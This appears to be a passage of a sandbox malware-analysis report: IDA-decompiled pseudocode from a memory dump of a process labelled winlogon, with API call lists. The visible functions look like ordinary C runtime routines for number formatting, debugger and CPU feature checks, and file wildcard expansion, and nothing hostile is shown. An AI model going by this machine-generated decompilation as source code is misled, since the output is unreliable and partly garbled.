    										while(1) {
    											_t793 = _v472;
    											__eflags = _t793;
    											if(__eflags == 0) {
    												goto L303;
    											}
    											_t1157 = 0;
    											_t1209 = _t793;
    											_t1049 = 0;
    											__eflags = 0;
    											do {
    												_t794 =  *(_t1235 + _t1049 * 4 - 0x1d0);
    												 *(_t1235 + _t1049 * 4 - 0x1d0) = _t794 * 0x3b9aca00 + _t1157;
    												asm("adc edx, 0x0");
    												_t1049 = _t1049 + 1;
    												_t1157 = _t794 * 0x3b9aca00 >> 0x20;
    												__eflags = _t1049 - _t1209;
    											} while (_t1049 != _t1209);
    											_t1210 = _v1872;
    											__eflags = _t1157;
    											if(_t1157 != 0) {
    												_t800 = _v472;
    												__eflags = _t800 - 0x73;
    												if(_t800 >= 0x73) {
    													__eflags = 0;
    													_push(0);
    													_v2408 = 0;
    													_v472 = 0;
    													_push( &_v2404);
    													_push(_t1025);
    													_push( &_v468);
    													L313();
    													_t1241 =  &(_t1241[4]);
    												} else {
    													 *(_t1235 + _t800 * 4 - 0x1d0) = _t1157;
    													_v472 = _v472 + 1;
    												}
    											}
    											_t799 = E00D793F0( &_v472,  &_v936);
    											_t1158 = 8;
    											_t1031 = _v1916 - _t1210;
    											__eflags = _t1031;
    											do {
    												_t708 = _t799 % _v1912;
    												_t799 = _t799 / _v1912;
    												_t1109 = _t708 + 0x30;
    												__eflags = _t1031 - _t1158;
    												if(_t1031 >= _t1158) {
    													 *((char*)(_t1158 + _t1210)) = _t1109;
    												}
    												_t1158 = _t1158 - 1;
    												__eflags = _t1158 - 0xffffffff;
    											} while (_t1158 != 0xffffffff);
    											__eflags = _t1031 - 9;
    											if(_t1031 > 9) {
    												_t1031 = 9;
    											}
    											_t1208 = _t1210 + _t1031;
    											_v1872 = _t1208;
    											__eflags = _t1208 - _v1916;
    											if(__eflags != 0) {
    												continue;
    											}
    											goto L303;
    										}
    									}
    									L303:
    									 *_t1208 = 0;
    									goto L309;
    								}
    							}
    						}
    					}
    				} else {
    					_t1031 = _t1196 & 0x000fffff;
    					if((_t1146 | _t1196 & 0x000fffff) != 0) {
    						goto L5;
    					} else {
    						_push(0xd81de4);
    						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
    						L308:
    						_push(_a24);
    						_push(_t1016);
    						if(E00D7176B() != 0) {
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							E00D70296();
    							asm("int3");
    							_push(_t1235);
    							_push(_t1196);
    							_t1197 = _v2424;
    							__eflags = _t1197;
    							if(_t1197 != 0) {
    								_t740 = _v0;
    								__eflags = _t740;
    								if(_t740 != 0) {
    									_push(_t1146);
    									_t1147 = _a8;
    									__eflags = _t1147;
    									if(_t1147 == 0) {
    										L320:
    										E00D6D520(_t1147, _t740, 0, _a4);
    										__eflags = _t1147;
    										if(_t1147 != 0) {
    											__eflags = _a4 - _t1197;
    											if(_a4 >= _t1197) {
    												_t742 = 0x16;
    											} else {
    												_t743 = E00D72122();
    												_push(0x22);
    												goto L324;
    											}
    										} else {
    											_t743 = E00D72122();
    											_push(0x16);
    											L324:
    											_pop(_t1199);
    											 *_t743 = _t1199;
    											E00D70269();
    											_t742 = _t1199;
    										}
    									} else {
    										__eflags = _a4 - _t1197;
    										if(_a4 < _t1197) {
    											goto L320;
    										} else {
    											E00D7DAE0(_t740, _t1147, _t1197);
    											_t742 = 0;
    										}
    									}
    								} else {
    									_t746 = E00D72122();
    									_t1200 = 0x16;
    									 *_t746 = _t1200;
    									E00D70269();
    									_t742 = _t1200;
    								}
    							} else {
    								_t742 = 0;
    							}
    							return _t742;
    						} else {
    							L309:
    							_t1248 = _v1936;
    							if(_v1936 != 0) {
    								E00D7B681(_t1031, _t1248,  &_v1944);
    							}
    							return E00D6ABE4(_v8 ^ _t1235);
    						}
    					}
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 85%
    			E00D6B406(intOrPtr __edx, intOrPtr __edi, intOrPtr _a4) {
    				char _v0;
    				struct _EXCEPTION_POINTERS _v12;
    				intOrPtr _v80;
    				intOrPtr _v88;
    				char _v92;
    				intOrPtr _v608;
    				intOrPtr _v612;
    				void* _v616;
    				intOrPtr _v620;
    				char _v624;
    				intOrPtr _v628;
    				intOrPtr _v632;
    				intOrPtr _v636;
    				intOrPtr _v640;
    				intOrPtr _v644;
    				_Unknown_base(*)()* _v648;
    				intOrPtr _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				intOrPtr _v664;
    				intOrPtr _v668;
    				char _v808;
    				char* _t38;
    				long _t48;
    				signed int _t50;
    				intOrPtr _t51;
    				signed char _t54;
    				intOrPtr _t55;
    				intOrPtr _t56;
    				intOrPtr _t57;
    
    				_t57 = __edi;
    				_t56 = __edx;
    				if(IsProcessorFeaturePresent(0x17) != 0) {
    					_t55 = _a4;
    					asm("int 0x29");
    				}
    				 *0xd90f18 = 0;
    				_v632 = E00D6D520(_t57,  &_v808, 0, 0x2cc);
    				_v636 = _t55;
    				_v640 = _t56;
    				_v644 = _t51;
    				_v648 = 0;
    				_v652 = _t57;
    				_v608 = ss;
    				_v620 = cs;
    				_v656 = ds;
    				_v660 = es;
    				_v664 = fs;
    				_v668 = gs;
    				asm("pushfd");
    				_pop( *_t15);
    				_v624 = _v0;
    				_t38 =  &_v0;
    				_v612 = _t38;
    				_v808 = 0x10001;
    				_v628 =  *((intOrPtr*)(_t38 - 4));
    				E00D6D520(_t57,  &_v92, 0, 0x50);
    				_v92 = 0x40000015;
    				_v88 = 1;
    				_v80 = _v0;
    				_t28 = IsDebuggerPresent() - 1; // -1
    				_v12.ExceptionRecord =  &_v92;
    				asm("sbb bl, bl");
    				_v12.ContextRecord =  &_v808;
    				_t54 =  ~_t28 + 1;
    				SetUnhandledExceptionFilter(0);
    				_t48 = UnhandledExceptionFilter( &_v12);
    				if(_t48 == 0) {
    					_t50 =  ~(_t54 & 0x000000ff);
    					asm("sbb eax, eax");
    					 *0xd90f18 =  *0xd90f18 & _t50;
    					return _t50;
    				}
    				return _t48;
    			}

    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6B413
    • IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 00D6B4DB
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D6B4FA
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00D6B504
    C-Code - Quality: 84%
    			E00D6B6CE(intOrPtr __edx) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed char _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _t51;
    				signed int _t53;
    				signed int _t56;
    				signed int _t57;
    				intOrPtr _t59;
    				signed int _t60;
    				signed int _t62;
    				intOrPtr _t67;
    				intOrPtr _t68;
    				intOrPtr* _t70;
    				intOrPtr _t76;
    				intOrPtr _t81;
    				intOrPtr* _t83;
    				signed int _t84;
    				signed int _t87;
    
    				_t81 = __edx;
    				 *0xd90f1c =  *0xd90f1c & 0x00000000;
    				 *0xd88010 =  *0xd88010 | 1;
    				if(IsProcessorFeaturePresent(0xa) == 0) {
    					L20:
    					return 0;
    				}
    				_v20 = _v20 & 0x00000000;
    				 *0xd88010 =  *0xd88010 | 0x00000002;
    				 *0xd90f1c = 1;
    				_t83 =  &_v44;
    				_push(1);
    				asm("cpuid");
    				_pop(_t67);
    				 *_t83 = 0;
    				 *((intOrPtr*)(_t83 + 4)) = 1;
    				 *((intOrPtr*)(_t83 + 8)) = 0;
    				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
    				_v12 = _v44;
    				_t51 = 1;
    				_t76 = 0;
    				_push(1);
    				asm("cpuid");
    				_pop(_t68);
    				 *_t83 = _t51;
    				 *((intOrPtr*)(_t83 + 4)) = _t67;
    				 *((intOrPtr*)(_t83 + 8)) = _t76;
    				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
    				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
    					L9:
    					_t84 =  *0xd90f20; // 0x0
    					L10:
    					_v28 = _v32;
    					_t53 = _v36;
    					_v8 = _t53;
    					_v24 = _t53;
    					if(_v12 >= 7) {
    						_t59 = 7;
    						_push(_t68);
    						asm("cpuid");
    						_t70 =  &_v44;
    						 *_t70 = _t59;
    						 *((intOrPtr*)(_t70 + 4)) = _t68;
    						 *((intOrPtr*)(_t70 + 8)) = 0;
    						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
    						_t60 = _v40;
    						_v20 = _t60;
    						_t53 = _v8;
    						if((_t60 & 0x00000200) != 0) {
    							 *0xd90f20 = _t84 | 0x00000002;
    						}
    					}
    					if((_t53 & 0x00100000) != 0) {
    						 *0xd88010 =  *0xd88010 | 0x00000004;
    						 *0xd90f1c = 2;
    						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
    							asm("xgetbv");
    							_v16 = _t53;
    							_v12 = _t81;
    							if((_v16 & 0x00000006) == 6 && 0 == 0) {
    								_t56 =  *0xd88010; // 0xf
    								_t57 = _t56 | 0x00000008;
    								 *0xd90f1c = 3;
    								 *0xd88010 = _t57;
    								if((_v20 & 0x00000020) != 0) {
    									 *0xd90f1c = 5;
    									 *0xd88010 = _t57 | 0x00000020;
    								}
    							}
    						}
    					}
    					goto L20;
    				}
    				_t62 = _v44 & 0x0fff3ff0;
    				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
    					_t87 =  *0xd90f20; // 0x0
    					_t84 = _t87 | 0x00000001;
    					 *0xd90f20 = _t84;
    					goto L10;
    				} else {
    					goto L9;
    				}
    			}

    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D6B6E7
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 72%
    			E00D75F8F(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
    				intOrPtr _v8;
    				signed int _v12;
    				intOrPtr _v28;
    				signed int _v32;
    				WCHAR* _v36;
    				signed int _v48;
    				intOrPtr _v556;
    				intOrPtr _v558;
    				struct _WIN32_FIND_DATAW _v604;
    				intOrPtr* _v608;
    				signed int _v612;
    				signed int _v616;
    				intOrPtr _v644;
    				intOrPtr _v648;
    				signed int _t40;
    				signed int _t45;
    				signed int _t48;
    				signed int _t50;
    				signed int _t51;
    				signed char _t53;
    				signed int _t62;
    				void* _t64;
    				union _FINDEX_INFO_LEVELS _t66;
    				signed int _t71;
    				intOrPtr* _t72;
    				signed int _t75;
    				void* _t82;
    				void* _t84;
    				signed int _t85;
    				void* _t89;
    				WCHAR* _t90;
    				intOrPtr* _t94;
    				intOrPtr _t97;
    				void* _t99;
    				signed int _t100;
    				intOrPtr* _t104;
    				signed int _t107;
    				void* _t110;
    				intOrPtr _t111;
    				void* _t112;
    				void* _t114;
    				void* _t115;
    				signed int _t117;
    				void* _t118;
    				union _FINDEX_INFO_LEVELS _t119;
    				void* _t124;
    				void* _t125;
    				signed int _t126;
    				void* _t127;
    				signed int _t132;
    				void* _t133;
    				signed int _t134;
    				void* _t135;
    				void* _t136;
    
    				_push(__ecx);
    				_t94 = _a4;
    				_push(__ebx);
    				_push(__edi);
    				_t2 = _t94 + 2; // 0x2
    				_t110 = _t2;
    				do {
    					_t40 =  *_t94;
    					_t94 = _t94 + 2;
    				} while (_t40 != 0);
    				_t117 = _a12;
    				_t97 = (_t94 - _t110 >> 1) + 1;
    				_v8 = _t97;
    				if(_t97 <= (_t40 | 0xffffffff) - _t117) {
    					_push(__esi);
    					_t5 = _t117 + 1; // 0x1
    					_t89 = _t5 + _t97;
    					_t124 = E00D71890(_t97, _t89, 2);
    					_pop(_t99);
    					__eflags = _t117;
    					if(_t117 == 0) {
    						L6:
    						_push(_v8);
    						_t89 = _t89 - _t117;
    						_t45 = E00D75D9F(_t99, _t124 + _t117 * 2, _t89, _a4);
    						_t134 = _t133 + 0x10;
    						__eflags = _t45;
    						if(__eflags != 0) {
    							goto L9;
    						} else {
    							_t82 = E00D76208(_a16, __eflags, _t124);
    							E00D717C5(0);
    							_t84 = _t82;
    							goto L8;
    						}
    					} else {
    						_push(_t117);
    						_t85 = E00D75D9F(_t99, _t124, _t89, _a8);
    						_t134 = _t133 + 0x10;
    						__eflags = _t85;
    						if(_t85 != 0) {
    							L9:
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							E00D70296();
    							asm("int3");
    							_t132 = _t134;
    							_t135 = _t134 - 0x260;
    							_t48 =  *0xd88004; // 0x276b9783
    							_v48 = _t48 ^ _t132;
    							_t111 = _v28;
    							_t100 = _v32;
    							_push(_t89);
    							_t90 = _v36;
    							_push(_t124);
    							_push(_t117);
    							_t125 = 0x5c;
    							_v644 = _t111;
    							_v648 = 0x2f;
    							_t118 = 0x3a;
    							while(1) {
    								__eflags = _t100 - _t90;
    								if(_t100 == _t90) {
    									break;
    								}
    								_t50 =  *_t100 & 0x0000ffff;
    								__eflags = _t50 - _v612;
    								if(_t50 != _v612) {
    									__eflags = _t50 - _t125;
    									if(_t50 != _t125) {
    										__eflags = _t50 - _t118;
    										if(_t50 != _t118) {
    											_t100 = _t100 - 2;
    											__eflags = _t100;
    											continue;
    										}
    									}
    								}
    								break;
    							}
    							_t126 =  *_t100 & 0x0000ffff;
    							__eflags = _t126 - _t118;
    							if(_t126 != _t118) {
    								L19:
    								_t51 = _t126;
    								_t119 = 0;
    								_t112 = 0x2f;
    								__eflags = _t51 - _t112;
    								if(_t51 == _t112) {
    									L23:
    									_t53 = 1;
    									__eflags = 1;
    								} else {
    									_t114 = 0x5c;
    									__eflags = _t51 - _t114;
    									if(_t51 == _t114) {
    										goto L23;
    									} else {
    										_t115 = 0x3a;
    										__eflags = _t51 - _t115;
    										if(_t51 == _t115) {
    											goto L23;
    										} else {
    											_t53 = 0;
    										}
    									}
    								}
    								_t103 = (_t100 - _t90 >> 1) + 1;
    								asm("sbb eax, eax");
    								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
    								E00D6D520(_t119,  &_v604, _t119, 0x250);
    								_t136 = _t135 + 0xc;
    								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119);
    								__eflags = _t127 - 0xffffffff;
    								if(_t127 != 0xffffffff) {
    									_t104 = _v608;
    									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
    									__eflags = _t62;
    									_v616 = _t62 >> 2;
    									_t64 = 0x2e;
    									do {
    										__eflags = _v604.cFileName - _t64;
    										if(_v604.cFileName != _t64) {
    											L36:
    											_push(_t104);
    											_t66 = E00D75F8F(_t90, _t104, _t119, _t127,  &(_v604.cFileName), _t90, _v612);
    											_t136 = _t136 + 0x10;
    											__eflags = _t66;
    											if(_t66 != 0) {
    												goto L26;
    											} else {
    												goto L37;
    											}
    										} else {
    											__eflags = _v558 - _t119;
    											if(_v558 == _t119) {
    												goto L37;
    											} else {
    												__eflags = _v558 - _t64;
    												if(_v558 != _t64) {
    													goto L36;
    												} else {
    													__eflags = _v556 - _t119;
    													if(_v556 == _t119) {
    														goto L37;
    													} else {
    														goto L36;
    													}
    												}
    											}
    										}
    										goto L40;
    										L37:
    										_t71 = FindNextFileW(_t127,  &_v604);
    										_t104 = _v608;
    										__eflags = _t71;
    										_t64 = 0x2e;
    									} while (_t71 != 0);
    									_t72 = _t104;
    									_t107 = _v616;
    									_t113 =  *_t72;
    									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
    									__eflags = _t107 - _t75;
    									if(_t107 != _t75) {
    										E00D7AE90(_t90, _t119, _t127, _t113 + _t107 * 4, _t75 - _t107, 4, E00D75DAA);
    									}
    								} else {
    									_push(_v608);
    									_t66 = E00D75F8F(_t90, _t103, _t119, _t127, _t90, _t119, _t119);
    									L26:
    									_t119 = _t66;
    								}
    								__eflags = _t127 - 0xffffffff;
    								if(_t127 != 0xffffffff) {
    									FindClose(_t127);
    								}
    							} else {
    								__eflags = _t100 -  &(_t90[1]);
    								if(_t100 ==  &(_t90[1])) {
    									goto L19;
    								} else {
    									_push(_t111);
    									E00D75F8F(_t90, _t100, 0, _t126, _t90, 0, 0);
    								}
    							}
    							__eflags = _v12 ^ _t132;
    							return E00D6ABE4(_v12 ^ _t132);
    						} else {
    							goto L6;
    						}
    					}
    				} else {
    					_t84 = 0xc;
    					L8:
    					return _t84;
    				}
    				L40:
    			}

    APIs
      • Part of subcall function 00D71890: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D7200F,00000001,00000364,?,?,?,00D72127,00D717EB,?,?,00D61B36), ref: 00D718D1
      • Part of subcall function 00D70296: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D70298
      • Part of subcall function 00D70296: GetCurrentProcess.KERNEL32(C0000417,?,?), ref: 00D702BA
      • Part of subcall function 00D70296: TerminateProcess.KERNEL32(00000000), ref: 00D702C1
    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00D760FD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 90%
    			E00D793F0(signed int* _a4, signed int* _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v52;
    				signed int _v56;
    				signed int _v60;
    				signed int _v64;
    				signed int _v68;
    				signed int _v72;
    				signed int _v76;
    				signed int* _v80;
    				char _v540;
    				signed int _v544;
    				signed int _t197;
    				signed int _t198;
    				signed int* _t200;
    				signed int _t201;
    				signed int _t204;
    				signed int _t206;
    				signed int _t208;
    				signed int _t209;
    				signed int _t213;
    				signed int _t219;
    				intOrPtr _t225;
    				void* _t228;
    				signed int _t230;
    				signed int _t247;
    				signed int _t250;
    				void* _t253;
    				signed int _t256;
    				signed int* _t262;
    				signed int _t263;
    				signed int _t264;
    				void* _t265;
    				intOrPtr* _t266;
    				signed int _t267;
    				signed int _t269;
    				signed int _t270;
    				signed int _t271;
    				signed int _t272;
    				signed int* _t274;
    				signed int* _t278;
    				signed int _t279;
    				signed int _t280;
    				intOrPtr _t282;
    				void* _t286;
    				signed char _t292;
    				signed int _t295;
    				signed int _t303;
    				signed int _t306;
    				signed int _t307;
    				signed int _t309;
    				signed int _t311;
    				signed int _t313;
    				intOrPtr* _t314;
    				signed int _t318;
    				signed int _t322;
    				signed int* _t328;
    				signed int _t330;
    				signed int _t331;
    				signed int _t333;
    				void* _t334;
    				signed int _t336;
    				signed int _t338;
    				signed int _t341;
    				signed int _t342;
    				signed int* _t344;
    				signed int _t349;
    				signed int _t351;
    				void* _t355;
    				signed int _t359;
    				signed int _t360;
    				signed int _t362;
    				signed int* _t368;
    				signed int* _t369;
    				signed int* _t370;
    				signed int* _t373;
    
    				_t262 = _a4;
    				_t197 =  *_t262;
    				if(_t197 != 0) {
    					_t328 = _a8;
    					_t267 =  *_t328;
    					__eflags = _t267;
    					if(_t267 != 0) {
    						_t3 = _t197 - 1; // -1
    						_t349 = _t3;
    						_t4 = _t267 - 1; // -1
    						_t198 = _t4;
    						_v16 = _t349;
    						__eflags = _t198;
    						if(_t198 != 0) {
    							__eflags = _t198 - _t349;
    							if(_t198 > _t349) {
    								L23:
    								__eflags = 0;
    								return 0;
    							} else {
    								_t46 = _t198 + 1; // 0x0
    								_t306 = _t349 - _t198;
    								_v60 = _t46;
    								_t269 = _t349;
    								__eflags = _t349 - _t306;
    								if(_t349 < _t306) {
    									L21:
    									_t306 = _t306 + 1;
    									__eflags = _t306;
    								} else {
    									_t368 =  &(_t262[_t349 + 1]);
    									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
    									__eflags = _t341;
    									while(1) {
    										__eflags =  *_t341 -  *_t368;
    										if( *_t341 !=  *_t368) {
    											break;
    										}
    										_t269 = _t269 - 1;
    										_t341 = _t341 - 4;
    										_t368 = _t368 - 4;
    										__eflags = _t269 - _t306;
    										if(_t269 >= _t306) {
    											continue;
    										} else {
    											goto L21;
    										}
    										goto L22;
    									}
    									_t369 = _a8;
    									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
    									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
    									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
    										goto L21;
    									}
    								}
    								L22:
    								__eflags = _t306;
    								if(__eflags != 0) {
    									_t330 = _v60;
    									_t200 = _a8;
    									_t351 =  *(_t200 + _t330 * 4);
    									_t64 = _t330 * 4; // 0xffffe9e5
    									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
    									_v36 = _t201;
    									asm("bsr eax, esi");
    									_v56 = _t351;
    									if(__eflags == 0) {
    										_t270 = 0x20;
    									} else {
    										_t270 = 0x1f - _t201;
    									}
    									_v40 = _t270;
    									_v64 = 0x20 - _t270;
    									__eflags = _t270;
    									if(_t270 != 0) {
    										_t292 = _v40;
    										_v36 = _v36 << _t292;
    										_v56 = _t351 << _t292 | _v36 >> _v64;
    										__eflags = _t330 - 2;
    										if(_t330 > 2) {
    											_t79 = _t330 * 4; // 0xe850ffff
    											_t81 =  &_v36;
    											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
    											__eflags =  *_t81;
    										}
    									}
    									_v76 = 0;
    									_t307 = _t306 + 0xffffffff;
    									__eflags = _t307;
    									_v32 = _t307;
    									if(_t307 < 0) {
    										_t331 = 0;
    										__eflags = 0;
    									} else {
    										_t85 =  &(_t262[1]); // 0x4
    										_v20 =  &(_t85[_t307]);
    										_t206 = _t307 + _t330;
    										_t90 = _t262 - 4; // -4
    										_v12 = _t206;
    										_t278 = _t90 + _t206 * 4;
    										_v80 = _t278;
    										do {
    											__eflags = _t206 - _v16;
    											if(_t206 > _v16) {
    												_t207 = 0;
    												__eflags = 0;
    											} else {
    												_t207 = _t278[2];
    											}
    											__eflags = _v40;
    											_t311 = _t278[1];
    											_t279 =  *_t278;
    											_v52 = _t207;
    											_v44 = 0;
    											_v8 = _t207;
    											_v24 = _t279;
    											if(_v40 > 0) {
    												_t318 = _v8;
    												_t336 = _t279 >> _v64;
    												_t230 = E00D7DA00(_t311, _v40, _t318);
    												_t279 = _v40;
    												_t207 = _t318;
    												_t311 = _t336 | _t230;
    												_t359 = _v24 << _t279;
    												__eflags = _v12 - 3;
    												_v8 = _t318;
    												_v24 = _t359;
    												if(_v12 >= 3) {
    													_t279 = _v64;
    													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
    													__eflags = _t360;
    													_t207 = _v8;
    													_v24 = _t360;
    												}
    											}
    											_t208 = E00D7D6E0(_t311, _t207, _v56, 0);
    											_v44 = _t262;
    											_t263 = _t208;
    											_v44 = 0;
    											_t209 = _t311;
    											_v8 = _t263;
    											_v28 = _t209;
    											_t333 = _t279;
    											_v72 = _t263;
    											_v68 = _t209;
    											__eflags = _t209;
    											if(_t209 != 0) {
    												L40:
    												_t264 = _t263 + 1;
    												asm("adc eax, 0xffffffff");
    												_t333 = _t333 + E00D7D8C0(_t264, _t209, _v56, 0);
    												asm("adc esi, edx");
    												_t263 = _t264 | 0xffffffff;
    												_t209 = 0;
    												__eflags = 0;
    												_v44 = 0;
    												_v8 = _t263;
    												_v72 = _t263;
    												_v28 = 0;
    												_v68 = 0;
    											} else {
    												__eflags = _t263 - 0xffffffff;
    												if(_t263 > 0xffffffff) {
    													goto L40;
    												}
    											}
    											__eflags = 0;
    											if(0 <= 0) {
    												if(0 < 0) {
    													goto L44;
    												} else {
    													__eflags = _t333 - 0xffffffff;
    													if(_t333 <= 0xffffffff) {
    														while(1) {
    															L44:
    															_v8 = _v24;
    															_t228 = E00D7D8C0(_v36, 0, _t263, _t209);
    															__eflags = _t311 - _t333;
    															if(__eflags < 0) {
    																break;
    															}
    															if(__eflags > 0) {
    																L47:
    																_t209 = _v28;
    																_t263 = _t263 + 0xffffffff;
    																_v72 = _t263;
    																asm("adc eax, 0xffffffff");
    																_t333 = _t333 + _v56;
    																__eflags = _t333;
    																_v28 = _t209;
    																asm("adc dword [ebp-0x28], 0x0");
    																_v68 = _t209;
    																if(_t333 == 0) {
    																	__eflags = _t333 - 0xffffffff;
    																	if(_t333 <= 0xffffffff) {
    																		continue;
    																	} else {
    																	}
    																}
    															} else {
    																__eflags = _t228 - _v8;
    																if(_t228 <= _v8) {
    																	break;
    																} else {
    																	goto L47;
    																}
    															}
    															L51:
    															_v8 = _t263;
    															goto L52;
    														}
    														_t209 = _v28;
    														goto L51;
    													}
    												}
    											}
    											L52:
    											__eflags = _t209;
    											if(_t209 != 0) {
    												L54:
    												_t280 = _v60;
    												_t334 = 0;
    												_t355 = 0;
    												__eflags = _t280;
    												if(_t280 != 0) {
    													_t266 = _v20;
    													_t219 =  &(_a8[1]);
    													__eflags = _t219;
    													_v24 = _t219;
    													_v16 = _t280;
    													do {
    														_v44 =  *_t219;
    														_t225 =  *_t266;
    														_t286 = _t334 + _v72 * _v44;
    														asm("adc esi, edx");
    														_t334 = _t355;
    														_t355 = 0;
    														__eflags = _t225 - _t286;
    														if(_t225 < _t286) {
    															_t334 = _t334 + 1;
    															asm("adc esi, esi");
    														}
    														 *_t266 = _t225 - _t286;
    														_t266 = _t266 + 4;
    														_t219 = _v24 + 4;
    														_t164 =  &_v16;
    														 *_t164 = _v16 - 1;
    														__eflags =  *_t164;
    														_v24 = _t219;
    													} while ( *_t164 != 0);
    													_t263 = _v8;
    													_t280 = _v60;
    												}
    												__eflags = 0 - _t355;
    												if(__eflags <= 0) {
    													if(__eflags < 0) {
    														L63:
    														__eflags = _t280;
    														if(_t280 != 0) {
    															_t338 = _t280;
    															_t314 = _v20;
    															_t362 =  &(_a8[1]);
    															__eflags = _t362;
    															_t265 = 0;
    															do {
    																_t282 =  *_t314;
    																_t172 = _t362 + 4; // 0xa6a5959
    																_t362 = _t172;
    																_t314 = _t314 + 4;
    																asm("adc eax, eax");
    																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
    																asm("adc eax, 0x0");
    																_t265 = 0;
    																_t338 = _t338 - 1;
    																__eflags = _t338;
    															} while (_t338 != 0);
    															_t263 = _v8;
    														}
    														_t263 = _t263 + 0xffffffff;
    														asm("adc dword [ebp-0x18], 0xffffffff");
    													} else {
    														__eflags = _v52 - _t334;
    														if(_v52 < _t334) {
    															goto L63;
    														}
    													}
    												}
    												_t213 = _v12 - 1;
    												__eflags = _t213;
    												_v16 = _t213;
    											} else {
    												__eflags = _t263;
    												if(_t263 != 0) {
    													goto L54;
    												}
    											}
    											_t331 = 0 + _t263;
    											asm("adc esi, 0x0");
    											_v20 = _v20 - 4;
    											_t313 = _v32 - 1;
    											_t262 = _a4;
    											_t278 = _v80 - 4;
    											_t206 = _v12 - 1;
    											_v76 = _t331;
    											_v32 = _t313;
    											_v80 = _t278;
    											_v12 = _t206;
    											__eflags = _t313;
    										} while (_t313 >= 0);
    									}
    									_t309 = _v16 + 1;
    									_t204 = _t309;
    									__eflags = _t204 -  *_t262;
    									if(_t204 <  *_t262) {
    										_t191 = _t204 + 1; // 0xd7aa0d
    										_t274 =  &(_t262[_t191]);
    										do {
    											 *_t274 = 0;
    											_t194 =  &(_t274[1]); // 0x91850fc2
    											_t274 = _t194;
    											_t204 = _t204 + 1;
    											__eflags = _t204 -  *_t262;
    										} while (_t204 <  *_t262);
    									}
    									 *_t262 = _t309;
    									__eflags = _t309;
    									if(_t309 != 0) {
    										while(1) {
    											_t271 =  *_t262;
